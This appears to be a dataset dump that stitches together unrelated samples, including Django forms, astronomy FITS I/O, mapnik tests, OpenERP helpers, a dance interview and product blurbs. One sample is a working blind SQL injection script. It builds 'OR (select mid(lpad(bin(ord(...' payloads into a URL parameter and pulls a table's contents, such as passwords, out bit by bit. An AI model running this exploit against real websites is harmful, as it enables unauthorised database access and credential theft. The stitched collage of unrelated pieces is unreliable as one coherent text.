text
stringlengths
29
850k
from datetime import timedelta as td import json import re from urllib.parse import quote, urlencode from django import forms from django.forms import URLField from django.conf import settings from django.core.exceptions import ValidationError from hc.front.validators import ( CronExpressionValidator, TimezoneValidator, WebhookValidator, ) import requests class HeadersField(forms.Field): message = """Use "Header-Name: value" pairs, one per line.""" def to_python(self, value): if not value: return {} headers = {} for line in value.split("\n"): if not line.strip(): continue if ":" not in line: raise ValidationError(self.message) n, v = line.split(":", maxsplit=1) n, v = n.strip(), v.strip() if not n or not v: raise ValidationError(message=self.message) headers[n] = v return headers def validate(self, value): super().validate(value) for k, v in value.items(): if len(k) > 1000 or len(v) > 1000: raise ValidationError("Value too long") class NameTagsForm(forms.Form): name = forms.CharField(max_length=100, required=False) tags = forms.CharField(max_length=500, required=False) desc = forms.CharField(required=False) def clean_tags(self): result = [] for part in self.cleaned_data["tags"].split(" "): part = part.strip() if part != "": result.append(part) return " ".join(result) class FilteringRulesForm(forms.Form): filter_by_subject = forms.ChoiceField(choices=(("no", "no"), ("yes", "yes"))) subject = forms.CharField(required=False, max_length=100) subject_fail = forms.CharField(required=False, max_length=100) methods = forms.ChoiceField(required=False, choices=(("", "Any"), ("POST", "POST"))) manual_resume = forms.BooleanField(required=False) def clean_subject(self): if self.cleaned_data["filter_by_subject"] == "yes": return self.cleaned_data["subject"] return "" def clean_subject_fail(self): if self.cleaned_data["filter_by_subject"] == "yes": return self.cleaned_data["subject_fail"] return "" class TimeoutForm(forms.Form): timeout = forms.IntegerField(min_value=60, max_value=2592000) grace = forms.IntegerField(min_value=60, max_value=2592000) def clean_timeout(self): return td(seconds=self.cleaned_data["timeout"]) def clean_grace(self): return td(seconds=self.cleaned_data["grace"]) class CronForm(forms.Form): schedule = forms.CharField(max_length=100, validators=[CronExpressionValidator()]) tz = forms.CharField(max_length=36, validators=[TimezoneValidator()]) grace = forms.IntegerField(min_value=1, max_value=43200) class AddOpsgenieForm(forms.Form): error_css_class = "has-error" region = forms.ChoiceField(initial="us", choices=(("us", "US"), ("eu", "EU"))) key = forms.CharField(max_length=40) PRIO_CHOICES = [ ("-2", "Lowest Priority"), ("-1", "Low Priority"), ("0", "Normal Priority"), ("1", "High Priority"), ("2", "Emergency Priority"), ] class AddPushoverForm(forms.Form): error_css_class = "has-error" pushover_user_key = forms.CharField() prio = forms.ChoiceField(initial="0", choices=PRIO_CHOICES) prio_up = forms.ChoiceField(initial="0", choices=PRIO_CHOICES) def get_value(self): key = self.cleaned_data["pushover_user_key"] prio = self.cleaned_data["prio"] prio_up = self.cleaned_data["prio_up"] return "%s|%s|%s" % (key, prio, prio_up) class AddEmailForm(forms.Form): error_css_class = "has-error" value = forms.EmailField(max_length=100) down = forms.BooleanField(required=False, initial=True) up = forms.BooleanField(required=False, initial=True) def clean(self): super().clean() down = self.cleaned_data.get("down") up = self.cleaned_data.get("up") if not down and not up: self.add_error("down", "Please select at least one.") class AddUrlForm(forms.Form): error_css_class = "has-error" value = forms.URLField(max_length=1000, validators=[WebhookValidator()]) METHODS = ("GET", "POST", "PUT") class WebhookForm(forms.Form): error_css_class = "has-error" name = forms.CharField(max_length=100, required=False) method_down = forms.ChoiceField(initial="GET", choices=zip(METHODS, METHODS)) body_down = forms.CharField(max_length=1000, required=False) headers_down = HeadersField(required=False) url_down = URLField( max_length=1000, required=False, validators=[WebhookValidator()] ) method_up = forms.ChoiceField(initial="GET", choices=zip(METHODS, METHODS)) body_up = forms.CharField(max_length=1000, required=False) headers_up = HeadersField(required=False) url_up = forms.URLField( max_length=1000, required=False, validators=[WebhookValidator()] ) def clean(self): super().clean() url_down = self.cleaned_data.get("url_down") url_up = self.cleaned_data.get("url_up") if not url_down and not url_up: if not self.has_error("url_down"): self.add_error("url_down", "Enter a valid URL.") def get_value(self): return json.dumps(dict(self.cleaned_data), sort_keys=True) class AddShellForm(forms.Form): error_css_class = "has-error" cmd_down = forms.CharField(max_length=1000, required=False) cmd_up = forms.CharField(max_length=1000, required=False) def get_value(self): return json.dumps(dict(self.cleaned_data), sort_keys=True) class PhoneNumberForm(forms.Form): error_css_class = "has-error" label = forms.CharField(max_length=100, required=False) phone = forms.CharField() def clean_phone(self): v = self.cleaned_data["phone"] stripped = v.encode("ascii", "ignore").decode("ascii") stripped = stripped.replace(" ", "").replace("-", "") if not re.match(r"^\+\d{5,15}$", stripped): raise forms.ValidationError("Invalid phone number format.") return stripped def get_json(self): return json.dumps({"value": self.cleaned_data["phone"]}) class PhoneUpDownForm(PhoneNumberForm): up = forms.BooleanField(required=False, initial=True) down = forms.BooleanField(required=False, initial=True) def get_json(self): return json.dumps( { "value": self.cleaned_data["phone"], "up": self.cleaned_data["up"], "down": self.cleaned_data["down"], } ) class ChannelNameForm(forms.Form): name = forms.CharField(max_length=100, required=False) class AddMatrixForm(forms.Form): error_css_class = "has-error" alias = forms.CharField(max_length=100) def clean_alias(self): v = self.cleaned_data["alias"] # validate it by trying to join url = settings.MATRIX_HOMESERVER url += "/_matrix/client/r0/join/%s?" % quote(v) url += urlencode({"access_token": settings.MATRIX_ACCESS_TOKEN}) r = requests.post(url, {}) if r.status_code == 429: raise forms.ValidationError( "Matrix server returned status code 429 (Too Many Requests), " "please try again later." ) doc = r.json() if "error" in doc: raise forms.ValidationError("Response from Matrix: %s" % doc["error"]) self.cleaned_data["room_id"] = doc["room_id"] return v class AddAppriseForm(forms.Form): error_css_class = "has-error" url = forms.CharField(max_length=512) class AddPdForm(forms.Form): error_css_class = "has-error" value = forms.CharField(max_length=32) ZULIP_TARGETS = (("stream", "Stream"), ("private", "Private")) class AddZulipForm(forms.Form): error_css_class = "has-error" bot_email = forms.EmailField(max_length=100) api_key = forms.CharField(max_length=50) site = forms.URLField(max_length=100, validators=[WebhookValidator()]) mtype = forms.ChoiceField(choices=ZULIP_TARGETS) to = forms.CharField(max_length=100) def get_value(self): return json.dumps(dict(self.cleaned_data), sort_keys=True) class AddTrelloForm(forms.Form): token = forms.RegexField(regex=r"^[0-9a-fA-F]{64}$") board_name = forms.CharField(max_length=100) list_name = forms.CharField(max_length=100) list_id = forms.RegexField(regex=r"^[0-9a-fA-F]{16,32}$") def get_value(self): return json.dumps(dict(self.cleaned_data), sort_keys=True)
Smashing down barriers with song. Music from the USA, Democratic Republic of Congo, Cape Verde, Mauritius, Guadeloupe, India, Pakistan, Mali, Mauritania, Turkey, Puerto Rico, Niger, and beyond. Seek the Earth and she will sing. Music from Democratic Republic of Congo, Mexico, Ethiopia, USA, Sudan, Niger, Cuba, South Africa and beyond. Enjoy an hour of vibrant musical diversity. Listen to sounds from Haiti, Mali, Tuva, Malaysia, India, Mauritius, USA, Bulgaria, Cameroon, Democratic Republic of Congo, Mauritania and beyond. Cycles of inspiration.
""" desispec.io.fluxcalibration =========================== IO routines for flux calibration. """ from __future__ import absolute_import, print_function import os from astropy.io import fits import numpy,scipy from desiutil.depend import add_dependencies from .util import fitsheader, native_endian, makepath def write_stdstar_models(norm_modelfile,normalizedFlux,wave,fibers,data,header=None): """Writes the normalized flux for the best models. Args: norm_modelfile : output file path normalizedFlux : 2D array of flux[nstdstars, nwave] wave : 1D array of wavelengths[nwave] in Angstroms fibers : 1D array of fiberids for these spectra data : meta data table about which templates best fit; should include BESTMODEL, TEMPLATEID, CHI2DOF, REDSHIFT """ hdr = fitsheader(header) add_dependencies(hdr) hdr['EXTNAME'] = ('FLUX', 'erg/s/cm2/A') hdr['BUNIT'] = ('erg/s/cm2/A', 'Flux units') hdu1=fits.PrimaryHDU(normalizedFlux.astype('f4'), header=hdr.copy()) hdr['EXTNAME'] = ('WAVELENGTH', '[Angstroms]') hdr['BUNIT'] = ('Angstrom', 'Wavelength units') hdu2 = fits.ImageHDU(wave.astype('f4'), header=hdr.copy()) hdr['EXTNAME'] = ('FIBERS', 'no dimension') hdu3 = fits.ImageHDU(fibers, header=hdr.copy()) hdr['EXTNAME'] = ('METADATA', 'no dimension') from astropy.io.fits import Column BESTMODEL=Column(name='BESTMODEL',format='K',array=data['BESTMODEL']) TEMPLATEID=Column(name='TEMPLATEID',format='K',array=data['TEMPLATEID']) CHI2DOF=Column(name='CHI2DOF',format='D',array=data['CHI2DOF']) REDSHIFT=Column(name='REDSHIFT',format='D',array=data['REDSHIFT']) cols=fits.ColDefs([BESTMODEL,TEMPLATEID,CHI2DOF,REDSHIFT]) tbhdu=fits.BinTableHDU.from_columns(cols,header=hdr) hdulist=fits.HDUList([hdu1,hdu2,hdu3,tbhdu]) tmpfile = norm_modelfile+".tmp" hdulist.writeto(tmpfile, clobber=True, checksum=True) os.rename(tmpfile, norm_modelfile) #fits.append(norm_modelfile,cols,header=tbhdu.header) def read_stdstar_models(filename): """Read stdstar models from filename. Args: filename (str): File containing standard star models. Returns: read_stdstar_models (tuple): flux[nspec, nwave], wave[nwave], fibers[nspec] """ with fits.open(filename, memmap=False) as fx: flux = native_endian(fx['FLUX'].data.astype('f8')) wave = native_endian(fx['WAVELENGTH'].data.astype('f8')) fibers = native_endian(fx['FIBERS'].data) return flux, wave, fibers def write_flux_calibration(outfile, fluxcalib, header=None): """Writes flux calibration. Args: outfile : output file name fluxcalib : FluxCalib object Options: header : dict-like object of key/value pairs to include in header """ hx = fits.HDUList() hdr = fitsheader(header) add_dependencies(hdr) hdr['EXTNAME'] = 'FLUXCALIB' hdr['BUNIT'] = ('(electrons/A) / (erg/s/cm2/A)', 'electrons per flux unit') hx.append( fits.PrimaryHDU(fluxcalib.calib.astype('f4'), header=hdr) ) hx.append( fits.ImageHDU(fluxcalib.ivar.astype('f4'), name='IVAR') ) hx.append( fits.CompImageHDU(fluxcalib.mask, name='MASK') ) hx.append( fits.ImageHDU(fluxcalib.wave, name='WAVELENGTH') ) hx.writeto(outfile+'.tmp', clobber=True, checksum=True) os.rename(outfile+'.tmp', outfile) return outfile def read_flux_calibration(filename): """Read flux calibration file; returns a FluxCalib object """ # Avoid a circular import conflict at package install/build_sphinx time. from ..fluxcalibration import FluxCalib fx = fits.open(filename, memmap=False, uint=True) calib = native_endian(fx[0].data.astype('f8')) ivar = native_endian(fx["IVAR"].data.astype('f8')) mask = native_endian(fx["MASK"].data) wave = native_endian(fx["WAVELENGTH"].data.astype('f8')) fluxcalib = FluxCalib(wave, calib, ivar, mask) fluxcalib.header = fx[0].header fx.close() return fluxcalib def read_stdstar_templates(stellarmodelfile): """ Reads an input stellar model file Args: stellarmodelfile : input filename Returns (wave, flux, templateid, teff, logg, feh) tuple: wave : 1D[nwave] array of wavelengths [Angstroms] flux : 2D[nmodel, nwave] array of model fluxes templateid : 1D[nmodel] array of template IDs for each spectrum teff : 1D[nmodel] array of effective temperature for each model logg : 1D[nmodel] array of surface gravity for each model feh : 1D[nmodel] array of metallicity for each model """ phdu=fits.open(stellarmodelfile, memmap=False) #- New templates have wavelength in HDU 2 if len(phdu) >= 3: wavebins = native_endian(phdu[2].data) #- Old templates define wavelength grid in HDU 0 keywords else: hdr0=phdu[0].header crpix1=hdr0['CRPIX1'] crval1=hdr0['CRVAL1'] cdelt1=hdr0['CDELT1'] if hdr0["LOGLAM"]==1: #log bins wavebins=10**(crval1+cdelt1*numpy.arange(len(phdu[0].data[0]))) else: #lin bins model_wave_step = cdelt1 model_wave_offset = (crval1-cdelt1*(crpix1-1)) wavebins=model_wave_step*numpy.arange(n_model_wave) + model_wave_offset paramData=phdu[1].data templateid=paramData["TEMPLATEID"] teff=paramData["TEFF"] logg=paramData["LOGG"] feh=paramData["FEH"] fluxData=native_endian(phdu[0].data) phdu.close() return wavebins,fluxData,templateid,teff,logg,feh
Attack of Professor Zoom!, The Manning, Matthew K. Captain Boomerang's Comeback! Hoena, Blake A. Captain Cold's Arctic Eruption Mason, Jane B. Ice and Flame Mason, Jane B. Killer Kaleidoscope Bright, J. E.
#!/usr/bin/env python3 # # -*- coding: utf8 -*- # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # Copyright 2014 Yannick Méheut <useless (at) utouch (dot) fr> import sys import requests def injection(target_url, string, column, table, where, index): ''' This function will be performing the injection. It will find each character, bit by bit. * target_url: the URL where the injection will be performed * string: the string we'll look for for the binary search outcome The function will return the found password. ''' print('[wait] retrieving data:', end='\t') sys.stdout.flush() data = '' i = 1 # While we don't have the entire password while True: char = 0 for j in range(1,8): # The injection performed here is URL-based # To use another mean of injection (HTTP Headers, Cookies...) # change the crafting between the hashtags #### CHANGE HERE if '?' in target_url: separator = '&' else: separator = '?' url = target_url + separator + "u=' OR " + \ "(select mid(lpad(bin(ord(mid({0},{1},1))),7,'0'),{2},1) " + \ "from {3} {4} " + \ "limit {5},1) = 1;-- &p=bla" url = url.format(column, i, j, table, where, index) r = requests.get(url) #### END OF CHANGE output = r.text # We seek which half of authorized_characters # we should search in if string in output: char += 2**(6 - j + 1) if char != 0: # When we find a character, we display it on stdout print(chr(char), end='') sys.stdout.flush() # We add it to the existing data data += chr(char) i += 1 else: break print('\r[done]') return data
homewatchguru serves the Tampa Bay Beaches of Florida, Pinellas County, St. Petersburg, Manatee County, Sarasota and the surrounding Areas. Pinellas County: Belleair Beach FL, Clearwater and Clearwater Beach FL, Dunedin FL, Gulfport FL, Indian Rocks Beach FL, Indian Shores FL, Largo FL, Madeira Beach FL, Palm Harbor FL, Pasadena FL, Pass-a-Grille FL, Pinellas Park FL, Redington Beach FL, Redington Shores FL, Safety HarborFL, Sand Key FL, Seminole FL, St. Petersburg FL, St. Pete Beach FL, Tierra Verde FL, Treasure Island FL. Manatee County: Anna Maria Island FL, Bradenton FL, Bradenton Beach FL, Holmes Beach FL, Longboat Key FL. Sarasota County: Boca Grande FL, Englewood FL, North Port FL, Sarasota FL, Siesta Key FL, Osprey FL, Venice FL. Broward County: Fort Lauderdale and surroundings.
#!/usr/bin/env python from nose.tools import * from utilities import execution_path import os, sys, glob, mapnik def setup(): # All of the paths used are relative, if we run the tests # from another directory we need to chdir() os.chdir(execution_path('.')) # We expect these files to not raise any # exceptions at all def assert_loads_successfully(file): m = mapnik.Map(512, 512) strict = True mapnik.load_map(m, file, strict) # libxml2 is not smart about paths, and clips the last directory off # of a path if it does not end in a trailing slash base_path = os.path.dirname(file) + '/' mapnik.load_map_from_string(m,open(file,'rb').read(),strict,base_path) # We expect these files to raise a RuntimeError # and fail if there isn't one (or a different type # of exception) @raises(RuntimeError) def assert_raises_runtime_error(file): m = mapnik.Map(512, 512) strict = True mapnik.load_map(m, file, strict) def test_broken_files(): broken_files = glob.glob("../data/broken_maps/*.xml") # Add a filename that doesn't exist broken_files.append("../data/broken/does_not_exist.xml") for file in broken_files: yield assert_raises_runtime_error, file def test_good_files(): good_files = glob.glob("../data/good_maps/*.xml") for file in good_files: yield assert_loads_successfully, file
Music, dance and fashion have always been interlinked in street culture and dance culture in China is definitely growing right now. We sat down with one the more prominent dancers in Guangzhou, Foshan, aptly named Biao Ge and find out that it's not just Wong Fei Hong that is famous in Foshan. FI : Hi Biao Ge, I am curious about your real name, would you be able to share with us and what are you up to? BG : HA, Hi everyone, my name is actually Ye Biao, and people call me Biao Ge as a form of respect, not because I am old haha! I am a professional dancer and I am based out of Foshan, GZ. FI : How's the dance scene in Foshan? Why did you decide to be a dancer? BG : The dance scene is massive here, and is growing every day. I have been seeing young dancers stepping up the game and getting better everyday. FI : You are a dance instructor at a pretty young age, how does that feel? BG : To be an instructor, it is definitely not an easy task, but for me I would say I am lucky as well. A good instructor needs to have a strong foundation, and with what I have, I believe it is sufficient to train other students. It's a totally different process to be an instructor as you need to impart your skills to students who, more than often, are learning dance for the first time, and what you teach them is of utmost importance as you are the first person that brings them the proper spirit and mindset into the world of dance. FI : What do you hope to see for the future of dance culture in China? BG : I think the dance culture is really strong and there are a lot of dance crew with a lot of potential and flair. The dance crew that we see now in China are probably on par with many international crew, but the reason that they aren't able to compete on the international level is due to visa problems, or financial situations where these crews aren't able to travel outside of China. My wish is to see these issues, which can be easily solved via our central government, especially on the visas and travel documentation. Funds to support these talented dancers can also come from both the government and private companies. With these support, I believe that the dance culture in China can reach its full potential. FI : In recent months, the hip hop and rap wave has swept China by storm, and dance is definitely one of the elements of the street culture inspired by hip hop. We have seen Rap Of China, and if there is a similar reality TV series for dance, would you take part? BG : Of course! In fact, there are some talks about having a program like that and I believe it will be launched next year! This will be a great platform to bring rise to the dancers who have been grinding since Day One to become recognised. FI : If you were to compare yourself to a piece of clothing, what would you be? BG : I would want to be a versatile piece of clothing. Something that has style, yet function, simple yet stylish. I can be anything you want and something that fits your body that perfectly integrates into your lifestyle. I am simple, but there's more than meets the eye. FI : Do you have any advise for aspiring dancers? BG : I think my advice is simple, but it is quite hard to follow, cos as a dancer myself, I know how it feels when your jam comes on and your body will start moving and groovin. haha. Sleep early, stick to your meal times regular and drink more warm water (haha) Do I sound like a real teacher now? I know it feels good to drink cold water right after a great dance workout but it's not good for health. Dance in itself is an activity that strengthens your mind and body, so if you do not take good care of your health, you might not be able to reach your full potential. FI : What about you, who do you look up to? BG : I really look up to 经伟老师, because besides from dancing, he asks us questions on how to evolve and perfect the art of dancing. Questions like, how to make a simple dance move into something with more flair, and how to differentiate yourself from other dancers. These thought provoking questions forces you think outside of just dancing and how to reinvent and create a style of individuality, and combine music and dance as an art form. When I first saw Biao Ge's video back in March, I was impressed, not because of how sharp and snappy his dance moves were, but how he managed to combine East and West elements into his video. As I found out more about him, I was impressed to know that at 27, he is already an instructor and that there is a bustling dance scene not just in GZ, but also in China. Feeling sheepish at my lack of knowledge and understanding of my Chinese friends, I realised that the culture is growing at such a fast rate that we need to play catch up real soon. Talking to Biao also made me realise that we are much fortunate to have a good infrastructure in Singapore which allows our creative talents to reach out to other similar communities on an international level, and vice versa. Dance might be relatively new in China and talking to Biao, I sense his fervour and vision on how he wants to be a part of a evolution that takes existing dance culture that came from the West and weave Chinese influences into it, and bringing it to the next level. This, to me, is the real Dance Dance Revolution.
#!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2005, 2006,2010 Zuza Software Foundation # # This file is part of the translate-toolkit # # translate is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # translate is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with translate; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA """Compile XLIFF and Gettext PO localization files into Gettext MO (Machine Object) files See: http://translate.sourceforge.net/wiki/toolkit/pocompile for examples and usage instructions """ from translate.storage import factory from translate.storage import mo from translate.misc.multistring import multistring def _do_msgidcomment(string): return u"_: %s\n" % string class POCompile: def convertstore(self, inputfile, includefuzzy=False): outputfile = mo.mofile() for unit in inputfile.units: if unit.istranslated() or (unit.isfuzzy() and includefuzzy and unit.target) or unit.isheader(): mounit = mo.mounit() if unit.isheader(): mounit.source = "" else: mounit.source = unit.source context = unit.getcontext() if unit.msgidcomment: if mounit.hasplural(): mounit.source = multistring(_do_msgidcomment(unit.msgidcomment) + mounit.source, *mounit.source.strings[1:]) else: mounit.source = _do_msgidcomment(unit.msgidcomment) + mounit.source elif context: mounit.msgctxt = [context] mounit.target = unit.target outputfile.addunit(mounit) return str(outputfile) def convertmo(inputfile, outputfile, templatefile, includefuzzy=False): """reads in a base class derived inputfile, converts using pocompile, writes to outputfile""" # note that templatefile is not used, but it is required by the converter... inputstore = factory.getobject(inputfile) if inputstore.isempty(): return 0 convertor = POCompile() outputmo = convertor.convertstore(inputstore, includefuzzy) # We have to make sure that we write the files in binary mode, therefore we # reopen the file accordingly outputfile.close() outputfile = open(outputfile.name, 'wb') outputfile.write(outputmo) return 1 def main(): from translate.convert import convert formats = {"po": ("mo", convertmo), "xlf": ("mo", convertmo)} parser = convert.ConvertOptionParser(formats, usepots=False, description=__doc__) parser.add_fuzzy_option() parser.run() if __name__ == '__main__': main()
This full size 12 cup Bundt(r) pan is made from cast aluminum that heats evenly for perfect cake texture and color. Sturdy cast aluminum provides superior baking performance. The pan is non-stick coated for easy release and clean-up. Bakes elegant, picture-perfect cakes with ease in a shape loved by millions. The pan can be used for many Bundt(r) recipes, pull-a-part bread, monkey bread as well as being a great jello mold. Use with a bakers non-stick spray (flour-based) to help release easily. We recommend that the pan be hand washed to help extend the life of the non-stick coating. Color: Silver.
# -*- coding: utf-8 -*- from osv import fields from datetime import date,datetime,time import logging _logger = logging.getLogger(__name__) #时间段选择 def time_for_selection(self,cr,uid,context = None): ret = [("%02i:00" % i,"%02i时30分" % i) for i in range(24)] + [("%02i:30" % i,"%02i时00分" % (i+1)) for i in range(24)] ret.sort() ret.pop() ret.append(("23:59","23时59分")) return ret #价格列表 def price_list_for_selection(self,cr,uid,context = None): ret =[("ting_price","大厅价"),("room_price","包厢价"),("member_price","会员价"),("vip_price","贵宾价"),("a_price","A类价"),("b_price","B类价")] return ret #房态定义 def room_states_for_selection(self,cr,uid,context = None): ret =[("free","空闲"),("in_use","使用"),("scheduled","预定"),("locked","锁定"),("checkout","已结账"),("buyout","买断"),("buytime","买钟"),("malfunction","故障"),("clean","清洁"),("debug","调试"),("visit","带客")] return ret #男女 def sexes_for_select(self,cr,uid,context = None): ret=[("F","女"),("M","男")] return ret #证件类型 def id_types_for_select(self,cr,uid,context = None): ret=[(1,"身份证"),(2,"驾驶证"),(3,"其他证件")] return ret #根据0 1 2 3 4 5 6 分别返回星期缩写 min =0 ~ sun= 6 def weekday_str(weekday_int): weekday_dict = { 0 : 'mon', 1 : 'tue', 2 : 'wed', 3 : 'thu', 4 : 'fri', 5 : 'sat', 6 : 'sun' } return weekday_dict[weekday_int] def current_user_tz(obj,cr,uid,context = None): """ 获取当前登录用户的时区设置 :param cursor cr 数据库游标 :params integer uid 当前登录用户id """ the_user = obj.pool.get('res.users').read(cr,uid,uid,['id','context_tz','name']) return the_user['context_tz'] def user_context_now(obj,cr,uid): """ 获取当前登录用户的本地日期时间 :return 本地化的当前日期 """ tz = current_user_tz(obj,cr,uid) context_now = fields.datetime.context_timestamp(cr,uid,datetime.now(),{"tz" : tz}) return context_now def minutes_delta(time_from,time_to): ''' 计算给定两个时间的相差分钟数 :param time_from string 形式是'09:30'的字符串,指的是起始时间 :param time_to string 形式是'09:30'的字符串,指的是结束时间时间 :return integer 两个时间的相差分钟数 ''' array_time_from = [int(a) for a in time_from.split(':')] array_time_to = [int(a) for a in time_to.split(':')] t1 = time(array_time_from[0],array_time_from[1]) t2 = time(array_time_to[0],array_time_to[1]) return (t2.hour - t1.hour)*60 + (t2.minute - t1.minute) def context_now_minutes_delta(obj,cr,uid,time_to): ''' 计算当前时间到给定时间的相差分钟数,该计算是以当期登录用户所在时区进行计算的 :param object obj osv对象 :param cursot cr 数据库游标 :param integer uid 当前登录用户 :param string time_to 当前时间 :return integer 两个时间的相差分钟数 ''' context_now = user_context_now(obj,cr,uid) return minutes_delta(context_now.strftime("%H:%M"),time_to) def context_strptime(osv_obj,cr,uid,str_time): ''' 将给定的时间字符串转变为当日的时间,以当前登录用户的时区为标准 :param osv_obj osv数据库对象 :param cr db cursor :param int uid 当前登录用户 :param str_time 形式为'09:30'的时间字符串 :return datetime 计算过后的日期对象 ''' context_now = user_context_now(osv_obj,cr,uid) time_array = [int(a) for a in str_time.split(":")] ret = context_now.replace(hour=time_array[0],minute=time_array[1]) return ret def str_to_today_time(time): ''' 将给定的字符串转换为当日的datetime :params time 形式如 09:30:00形式的时间字符串 :return 日期为当日,时间为传入参数的datetime对象 ''' now = datetime.now() array_time = [int(a) for a in time.split(':')] ret = now.replace(hour=array_time[0],minute = array_time[1],second = array_time[2]) return ret def utc_time_between(str_time_from,str_time_to,str_cur_time): """ 判断给定的时间字符串是否在给定的时间区间内 由于对时间统一采用UTC时间保存,可能存在time_to < time_from的情况 :params string str_time_from 形式类似 09:10的时间字符串 :params string str_time_to 形式类似 09:10的时间字符串 :params str_cur_time 要比较的时间字符串 :return True 在范围内 else False """ if str_time_to > str_time_from: return str_cur_time >= str_time_from and str_cur_time <= str_time_to else: #如果存在time_from 大于 time_to的情况,则说明时间跨天 return (str_cur_time >= str_time_from and str_cur_time < '23:59:59') or (str_cur_time >='00:00:00' and str_cur_time <= str_time_to) def calculate_present_minutes(buy_minutes,promotion_buy_minutes = 0,promotion_present_minutes = 0): """ 根据给定的参数计算赠送时长 买钟时间(分钟数) / 设定买钟时长(分钟数) * 赠送时长 :params buy_minutes integer 买钟时间 :params promotion_buy_minutes integer 买钟优惠设置中设定的买钟时长 :params promotion_present_minutes integer 买钟优惠设置中设定的赠送时长 :return integer 赠送时长 """ #如果未设置优惠信息,则不赠送,直接返回买钟时间 if not promotion_buy_minutes: return buy_minutes present_minutes = buy_minutes / promotion_buy_minutes * promotion_present_minutes return present_minutes
admin, Author at FULHAM & CO. Trombetta has acquired Electronic Design Inc. (EDI) located in Sheboygan Falls, WI. EDI specializes in customized electronic control design products; many which utilize CAN-based communication. Abacus Finance Group LLC has provided $16 million to back Fulham & Co‘s acquisition of Alkota Cleaning Systems. Based in Alcester, South Dakota, Alkota is a maker of commercial and industrial pressure washing and cleaning equipment. Avante Mezzanine Partners announced today that it has provided mezzanine debt and an equity co-investment to support the acquisition of Delphon Industries, LLC (“Delphon”) in a transaction led by Fulham & Co.
import datastore import timed_input import packet import datalogger import multiprocessing import position import time start_data = False input_timeout = 3 #3 seconds to wait for response num_packets = 0 num_failures = 0 init_time = time.time() print "init_time: ", print init_time in_packet = ("",False) def t_input_actual(message): global in_packet in_data = "" try: in_data = str(timed_input.nonBlockingRawInput(message,input_timeout)) print "received: ", print in_data in_packet = in_data, True return in_packet except EOFError, err: pass return in_data def t_input(message): return "" #packet takes form #":,(id),|(message)|checksum" #id: # 0: custom data packet # 1: change settings # 2: request all current sensor data # 3: request all env logging data # 4: request all position tracking data # 5: request all heat map data # 6: request all stored heat map data # 7: request all stored sensor data # 8: request all error data #message: # 0: for id 2-7 # sensor_id,setting,value;...: for id 1 # sensor_id: 0 accel,1 mag,2 gyro,3, gsm # setting: 0 power,1 update,2 full scale deflection # value: 0 false, 1 true # _,_,_,_,_,_,_;_,_,_,_,_,_,_;_;_;_;_: for custom packet- ind_data,inc_all_data,error,pos,mat,map #checksum: see method def parse_packet(packet): global num_packets,num_failures num_packets = num_packets + 1 try: t_packet = packet.split(":")[1] #identifying packet by initial ':' p_packet = t_packet.split("|") #splitting packet into header,body,and footer, separated by '|' header = int(p_packet[0].split(",")[1]) #extracting identifier int from header body = p_packet[1] footer = int(p_packet[2]) return header,body,footer except: num_failures = num_failures+1 sms_malformed_packet() return -1 def sms_malformed_packet(): #texts home in case of malformed packet return None def parse_body(header,body): global num_packets checksum_contribution = 0 try: if header==0: #custom data packet packet_settings = body.split(";") inc_data = packet_settings[0] inc_all_data = packet_settings[1] inc_error = packet_settings[2] inc_pos = packet_settings[3] inc_mat = packet_settings[4] inc_map = packet_settings[5] packet.init_packet(inc_data,inc_all_data,inc_error,inc_pos,inc_mat,inc_map) send_packet(packet.build_packet()) if header==1: settings_list = body.split(";") for setting in settings_list: power = True update = True deflection = True if setting[0] == 0: #accelerometer if setting[1] == 0: if setting[2] == 0: power = False if setting[1] == 1: if setting[2] == 0: update = False if setting[1] == 2: if setting[2] ==0: deflection = False datastore.set_accelerometer_settings(power, update, deflection) if setting[0] == 1: #magnetometer if setting[1] == 0: if setting[2] == 0: power = False if setting[1] == 1: if setting[2] == 0: update = False if setting[1] == 2: if setting[2] ==0: deflection = False datastore.set_magnetometer_settings(power, update, deflection) if setting[0] == 2: #gyroscope if setting[1] == 0: if setting[2] == 0: power = False if setting[1] == 1: if setting[2] == 0: update = False if setting[1] == 2: if setting[2] ==0: deflection = False datastore.set_gyroscope_settings(power, update, deflection) if setting[0] == 3: #sim800l if setting[1] == 0: if setting[2] == 0: power = False return_read() if header==2: packet.init_packet_type(1) send_packet(packet.build_packet()) if header==3: packet.init_packet_type(2) send_packet(packet.build_packet()) if header==4: packet.init_packet_type(3) send_packet(packet.build_packet()) if header==5: packet.init_packet_type(4) send_packet(packet.build_packet()) if header==6: packet.init_packet_type(5) send_packet(packet.build_packet()) if header==7: packet.init_packet_type(6) send_packet(packet.build_packet()) if header==8: packet.init_packet_type(7) send_packet(packet.build_packet()) return 1 except: num_failures = num_failures+1 sms_malformed_packet() return -1 def send_packet(packet): print packet def return_ready(): print "ready" def overall_control(): global in_packet while True: #tall = time.time() if in_packet[1] == False: t_input("") if in_packet[1] == True: parsed_packet = parse_packet(in_packet[0]) if parsed_packet != -1: #t = time.time() build_packet(parsed_packet[0],parsed_packet[1]) #print "build packet time", #print time.time()-t send_packet(packet.build_packet()) #print "total time", #print time.time()-tall #Actual code execution return_ready() #ready returned on startup datastore.setTime(init_time) position.setTime(init_time) #Control process manages overall packetization / communicatio with the base station #Logger process independently manages data logging and recording to files if __name__ == '__main__': control = multiprocessing.Process(target=overall_control) logger = multiprocessing.Process(target=datalogger.add_all_inf) control.start() logger.start()
Different types of logos are used in all spheres of modern life. Today it becomes very hard to create the one that might look unique and would not violate anybody`s rights. At You and Eye Advertising Logo one will find thousands of various logo examples that are related and can be used in all spheres, from business to different types of entertainment.
